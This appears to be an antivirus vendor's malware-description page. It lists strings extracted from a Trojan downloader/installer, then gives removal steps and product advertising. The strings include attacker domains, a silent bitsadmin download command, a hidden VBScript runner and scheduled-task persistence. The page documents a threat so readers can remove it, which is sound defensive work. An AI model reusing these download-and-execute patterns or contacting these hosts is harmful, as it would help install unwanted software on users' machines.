CDownload::Install started m_id=%d shortName=%S
CDownload::Install Failed to delete file %S , error %d
CDownload::Install Error on CreateDirectory %S , error %d
CDownload::Install Change file name %S
CDownload::Install Failed to move temp file '%S' to %S , error %d
CDownload::Install DownloadType=%d
%S Running for %S: '%S' '%S'
CDownload::Install Trying to open folder (%S) containing zip , error %d
CDownload::Install Failed to run (%S) , error %d
%S BEFORE activating Wait4TreeThread %d %d
%S ACTIVATING Wait4TreeThread %d %d
%S AFTER activating Wait4TreeThread %d %d nCount %d
CDownload::Install %S wait %ld milliseconds before set status to dst_InstallProcessEnded
CDownload::Install %S wait %ld milliseconds before set status to dst_InstallProcessTreeEnded
CDownload::Install Child process for %S (id %d) ended, RC=%d, status=%d
Wait 4 3 skipped for %S
CDownload::Install Ended for m_id=%d shortName=%S
Process 3 for %S (id %d) empty
Timeout waiting for process 3 %S (id %d)
Process tree for %S ended
Looking for processes tree of %d: parents size %d, pending size %d
%S running, wait for %S ended
3 for %d: parents size %d, pending size %d rc=%d
CDownload::SetState for '%S' is %d
CDownload::AddThanksParameter p=%S v=%d
HtmlDialog::GetIDsOfNames(NOT IMPLEMENTED %S)
JsLog: %S
CInstallationManager::IntOnDownloadCompleted: Download id=%d ShortName=%S
CInstallationManager::IntOnDownloadCompleted Id %d download ended OK
CInstallationManager::IntOnDownloadCompleted Id %d assigned to %S, retry state %d
CInstallationManager::IntOnDownloadCompleted Status=%d for component_id=%d, error=%d
CInstallationManager::EnqueueInstallation ReadyToInstall %S
CInstallationManager::EnqueueInstallation Error on ReadyToInstall %S
CInstallationManager::Download(%S, %S, %S)
CInstallationManager::Install(%d, %S, %S,%d)
CInstallationManager::IntDownload(%S, %S, %S,%d)
CInstallationManager::IntDownload Id %d assigned to %S, state=%d
CInstallationManager::IntDownload Id %d assigned to %S, state=%d(retry)
CInstallationManager::IntDownload state == dst_DownloadEndedError s_hTotalDownloadErrors=%d
CInstallationManager::IntDownload s_hTotalDownloadErrors %d
CInstallationManager::IntDownload: Adding CDownload for %S to m_downloads)
CInstallationManager::IntInstall(id=%d, installCmdLine=%S, ProcessName=%S, installMode=%d)
%d postponed runs released
CInstallationManager::IntReleasePostponed Add %S to the end of the list
ReleasePostponed %S
CInstallationManager::RemovePossibleComponents %S removed from list
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
Temp file %S moved to %S, success %d
Key %X/%S opened, error %d
Value %S written, error %d
RegCreateKeyTransactedW
RegOpenKeyExA
RegCloseKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion
RegOpenKeyTransactedW
CTaskScheduleHandler::CreateNewTask Failed to create an instance of ITaskService: %x
CTaskScheduleHandler::CreateNewTask ITaskService::Connect failed: %x
CTaskScheduleHandler::CreateNewTask Cannot get Root folder pointer: %x
CTaskScheduleHandler::CreateNewTask Failed to CoCreate an instance of the TaskService class: %x
CTaskScheduleHandler::CreateNewTask Cannot get identification pointer: %x
CTaskScheduleHandler::CreateNewTask Cannot put identification info: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot get principal pointer: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot put RunLevel principal info: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot put LogonType principal info: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot get settings pointer: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot put setting hidden information: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot put setting information: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot get idle setting information: %x
CTaskScheduleHandler::SetSecurityCredentials Cannot put idle setting information: %x
CTaskScheduleHandler::CreateTaskTrigger Cannot get trigger collection: %x
CTaskScheduleHandler::CreateTaskTrigger Cannot create trigger: %x
CTaskScheduleHandler::CreateTaskTrigger QueryInterface call failed for ITimeTrigger: %x
CTaskScheduleHandler::CreateTaskTrigger Cannot put trigger ID: %x
CTaskScheduleHandler::CreateTaskTrigger Cannot put end boundary on trigger: %x
CTaskScheduleHandler::CreateTaskTrigger Cannot add start boundary to trigger: %x
CTaskScheduleHandler::SaveTask Error saving the Task: %x
CTaskScheduleHandler::SaveTask Cannot get Task collection pointer: %x
CTaskScheduleHandler::SaveTask Cannot create the action: %x
CTaskScheduleHandler::SaveTask QueryInterface call failed for IExecAction: %x
CTaskScheduleHandler::SaveTask Cannot put action path: %x
CTaskScheduleHandler::SaveTask Cannot put action arguments: %x
CTaskScheduleHandler::CreateDownloadTask Cannot create a new task: %x
CTaskScheduleHandler::CreateDownloadTask Fail to add registration info: %x
CTaskScheduleHandler::CreateDownloadTask Fail to add security credentials: %x
CTaskScheduleHandler::CreateDownloadTask Failed to create an instance of ITaskService: %x
CTaskScheduleHandler::CreateDownloadTask Fail to add trigger: %x
CTaskScheduleHandler::CreateDownloadTask Cannot create the download action: %x
CTaskScheduleHandler::CreateDownloadTask Fail to save the task: %x
CTaskScheduleHandler::CreateInstallTask Cannot create a new task: %x
CTaskScheduleHandler::CreateInstallTask Fail to add registration info: %x
CTaskScheduleHandler::CreateInstallTask Fail to add security credentials: %x
CTaskScheduleHandler::CreateInstallTask Fail to add settings: %x
CTaskScheduleHandler::CreateInstallTask Fail to add trigger: %x
CTaskScheduleHandler::CreateInstallTask Cannot create the execute action: %x
CTaskScheduleHandler::CreateInstallTask Cannot create the delete action: %x
CTaskScheduleHandler::CreateInstallTask Fail to save the task: %x
"'\?<>&= %,/:!#$;[]()
Process=%S command=%S verb=%S, result=%d
%c%c%c%c
C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
zcÁ
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUDWebBrowserEvents2@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;<=
!"#$%&'()* ,-./0123
.sssh
REÚ
\.crr
s1f-'
.DC l
tweb
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
9%9s9
:(:2:8:\:
4,4}4'5.5
5!5'565?5
5'5/555<5
=&=.=6=\=
7 7@7`7|7
= =<=@=`=
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wKERNEL32.DLL
ADVAPI32.DLL
WUSER32.DLL
Winhttp.dll
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
Dole32.dll
WContent-Type: application/x-www-form-urlencoded
hXXp://VVV.%s/index.php
ficbetaglucose.site
appimageurl
InternetExplorer.Application
cmdl
Network error (%d) encountered, install aborted
debug.html
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
W\Support Tools\bitsadmin.exe
:?*\"'/.
:Zone.Identifier
%s\%s.lnk
%s\*%s*.lnk
%samipixel.cfg
%sami*.tmp.ico
%s%s*.exe
dream.capture
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
c[%s][%s]
/retrynav %d
shell32.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%TEMP%\amilog.txt
&You are about to exit the installation. Click OK to Exit and install %s including other optional programs.
&Resume installation on next Windows startup
.exe.msi.zip.xap.bat
%Windir%\System32\msiexec.exe
/i "%s"
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
/install:"%s" /origin:%s
kernel32.dll
CheckRegKey
BestReaderCheckRegKey
IsShortNameInstalled
sn=%s&hx=%S&base=%s
rfsw%d
BAdvapi32.dll
advapi32.dll
Iphlpapi.dll
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%S\Connection
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
NT%d.%dSP%d
%ProgramFiles%\Mozilla Firefox\firefox.exe
%localappdata%\Google\Chrome\Application\chrome.exe
%ProgramFiles%\Google\Chrome\Application\chrome.exe
%d.%d.%d.%d
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("%s",0,False)
WScript.Sleep 300000
cmds=WshShell.RUN("bitsadmin /cancel %s",0,False)
%%X
Wversion.dll
OleAut32.dll
c:\%original file name%.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
setup.exe
millesimalnonremuneration.site


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\FailedToInstall[1].htm (715 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now